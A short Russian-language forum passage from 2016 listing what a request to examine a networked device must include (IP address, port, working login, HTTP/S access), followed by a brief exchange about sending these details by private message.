1. Есть устройство, вот его IP-адрес X.X.X.X и доступ по порту XXXX

2. Вот проверенные данные входа superuser:superpass

3. Устройство доступно извне, работает по протоколу HTTP/S, и его можно исследовать

Данный набор устройств не в приоритете, поэтому заявка вряд ли будет быстро исполнена. Тем не менее, правила для всех едины.




А можно такое отправлять в личку? )

carartem02
26.12.2016, 00:15
А можно такое отправлять в личку? )



Я ему давно писал и вроде всё ок было. Скорее всего, да